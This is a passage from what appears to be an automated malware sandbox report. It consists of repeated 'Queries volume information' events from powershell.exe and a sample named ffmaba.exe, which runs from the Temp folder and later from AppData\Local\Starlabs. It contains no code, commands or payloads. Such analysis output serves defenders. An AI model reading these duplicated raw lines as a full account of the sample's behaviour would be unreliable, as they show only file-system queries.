                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ffmaba.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
